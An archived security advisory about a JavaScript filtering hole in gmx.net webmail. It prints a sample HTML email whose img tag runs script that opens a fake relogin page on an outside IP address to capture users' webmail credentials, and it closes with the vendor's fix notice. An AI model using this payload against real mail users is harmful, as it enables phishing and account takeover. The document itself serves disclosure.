TUCoPS :: Web :: Specific Sites :: gmx~1.htm

gmx.net javascript filtering weakness
Vulnerability

    gmx.net

Affected

    gmx.net

Description

    "rudi carell" found following.   gmx.net is a european-based  free
    web-mail, web-community system comparable with hotmail.com.   Like
    many  other  web-mail  systems  gmx.net  has  a  problem filtering
    java-script in html-based mail-messages.

    This enables  an attacker  to create  html-messages with malicious
    java-script embedded.

    The html - <img> tag can be used to embedd malicious  java-scripts
    within  html-mails.   Once  the  "html-mailpart"  is opened by the
    gmx-user it is possible the "embedded" java-script is executed  by
    the  web-browser  (if  enabled)  this  makes  it possible to place
    trojans  and  execute  URL-based  webmail-commands  leading  to  a
    compromise of the users webmail-account.

    Sample with "classic" relogin-trojan:

        <html><body>
        <img src="javascript: gmx=window.open('http://216.147.4.38/gmx/index.html','gmx',width='1000',height='800');window.opener.blur();window.opener.resizeTo(1,1);self.blur();self.resizeTo(1,1);w=screen.availWidth;h=screen.availHeight-40;gmx.moveTo(0,0);gmx.resizeTo(w,h);gmx.focus();">
        <h4>mungo baby</h4></body></html>

    ..  not  very  sophisticated  but working... changing user-options
    would be more elaborate ..

Solution

    gmx.net displays HTML-based message content in a special  security
    window  (called  "Volldarstellung"  =  full  display  mode)  which
    doesn't contain the  session ID of  the logged in  user.  Therefor
    it shouldn't be  possible to compromise  the users account  on our
    system by such tricks.  Anyway, this is fixed now.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH